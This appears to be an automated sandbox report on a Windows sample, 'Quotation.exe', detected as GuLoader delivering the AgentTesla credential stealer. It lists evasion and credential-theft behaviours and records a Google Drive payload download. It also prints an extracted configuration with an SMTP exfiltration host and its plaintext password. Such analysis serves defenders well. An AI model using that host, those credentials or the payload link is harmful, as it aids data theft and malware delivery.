Edit tour

Windows Analysis Report
Quotation.exe

Overview

General Information

Sample name:	Quotation.exe
Analysis ID:	1553547
MD5:	5bdcc2d33ca974c1d8448afcf83f74d1
SHA1:	f693dea01991d995173a5934d478ad43c50e28e2
SHA256:	4ad4bb99aa68ac6d5828c71c3f3d5d2983ead0626fd77aba7bb98de727a4b90b
Tags:	exeuser-adrian__luca
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

AI detected suspicious sample

Initial sample is a PE file and has a suspicious name

Installs a global keyboard hook

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Quotation.exe (PID: 7016 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 5BDCC2D33CA974C1D8448AFCF83F74D1)

Quotation.exe (PID: 4068 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 5BDCC2D33CA974C1D8448AFCF83F74D1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.2801542235.00000000383B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2801542235.00000000383B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2334492638.000000000A0C3000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Quotation.exe PID: 4068	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Quotation.exe PID: 4068	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DesusertionIp: 67.23.226.139, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Quotation.exe, Initiated: true, ProcessId: 4068, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49929

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T11:48:51.460958+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.9	49705	TCP
2024-11-11T11:49:29.254638+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.9	49712	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T11:50:07.152121+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49868	142.250.186.78	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: Quotation.exe.4068.6.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}

Multi AV Scanner detection for submitted file

Source: Quotation.exe

ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Quotation.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49868 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.1:443 -> 192.168.2.9:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49908 version: TLS 1.2

Source: Quotation.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_004066F7
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_004065AD FindFirstFileW,FindClose,		0_2_004065AD

Source: global traffic

TCP traffic: 192.168.2.9:49929 -> 67.23.226.139:587

Source: Joe Sandbox View	IP Address: 67.23.226.139 67.23.226.139
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

ASN Name: DIMENOCUS DIMENOCUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49712
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49705
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49868 -> 142.250.186.78:443

Source: global traffic

TCP traffic: 192.168.2.9:49929 -> 67.23.226.139:587

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: mail.showpiece.trillennium.biz

Source: Quotation.exe, 00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.showpiece.trillennium.biz
Source: Quotation.exe, 00000000.00000000.1529758782.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Quotation.exe, 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Quotation.exe, 00000006.00000000.2328570673.0000000000408000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802098526.000000003A38B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802098526.000000003A38B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: Quotation.exe, 00000006.00000002.2801542235.0000000038361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Quotation.exe, 00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://showpiece.trillennium.biz
Source: Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Quotation.exe, 00000006.00000003.2574356823.000000003A3AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.len
Source: Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Quotation.exe, 00000006.00000002.2801542235.0000000038361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: Quotation.exe, 00000006.00000002.2801542235.0000000038361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: Quotation.exe, 00000006.00000002.2801542235.0000000038361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Quotation.exe, 00000006.00000002.2780628654.0000000007C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/;
Source: Quotation.exe, 00000006.00000002.2780628654.0000000007C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/C
Source: Quotation.exe, 00000006.00000002.2780628654.0000000007C44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f
Source: Quotation.exe, 00000006.00000003.2506545881.0000000007C89000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2780628654.0000000007C72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2780628654.0000000007C07000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2506545881.0000000007C89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f&export=download
Source: Quotation.exe, 00000006.00000002.2780628654.0000000007C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f&export=download0
Source: Quotation.exe, 00000006.00000003.2506545881.0000000007C89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f&export=downloadn
Source: Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49868 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.1:443 -> 192.168.2.9:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49908 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\Desktop\Quotation.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Quotation.exe

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Quotation.exe

Source: C:\Users\user\Desktop\Quotation.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Quotation.exe

Code function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,

0_2_004036DA

Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_6FF82351	0_2_6FF82351
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_0015A500	6_2_0015A500
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_0015A950	6_2_0015A950
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_0015D990	6_2_0015D990
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_00154A98	6_2_00154A98
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_00153E80	6_2_00153E80
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_001541C8	6_2_001541C8
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3AB4B2BA	6_2_3AB4B2BA
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3AB46698	6_2_3AB46698
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3AB47E20	6_2_3AB47E20
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3AB4C220	6_2_3AB4C220
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3AB45648	6_2_3AB45648
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3AB43108	6_2_3AB43108
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3AB42338	6_2_3AB42338
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3AB47740	6_2_3AB47740
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3AB4E440	6_2_3AB4E440
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3AB40040	6_2_3AB40040
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3AB45D83	6_2_3AB45D83
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3B671985	6_2_3B671985
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3B671988	6_2_3B671988
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3B7D4B38	6_2_3B7D4B38
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3B7D0040	6_2_3B7D0040
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3AB40037	6_2_3AB40037
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3AB40006	6_2_3AB40006

Source: Quotation.exe

Static PE information: invalid certificate

Source: Quotation.exe, 00000006.00000002.2780628654.0000000007C72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Quotation.exe
Source: Quotation.exe, 00000006.00000002.2801204973.0000000037FA9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Quotation.exe

Source: Quotation.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/12@4/4

Source: C:\Users\user\Desktop\Quotation.exe

0_2_004036DA

Source: C:\Users\user\Desktop\Quotation.exe

File created: C:\Users\user\overlays

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Quotation.exe

File created: C:\Users\user\AppData\Local\Temp\nsdEDDF.tmp

Jump to behavior

Source: Quotation.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Quotation.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Quotation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Quotation.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Quotation.exe

ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\Quotation.exe

File read: C:\Users\user\Desktop\Quotation.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
Source: C:\Users\user\Desktop\Quotation.exe	Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
Source: C:\Users\user\Desktop\Quotation.exe	Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
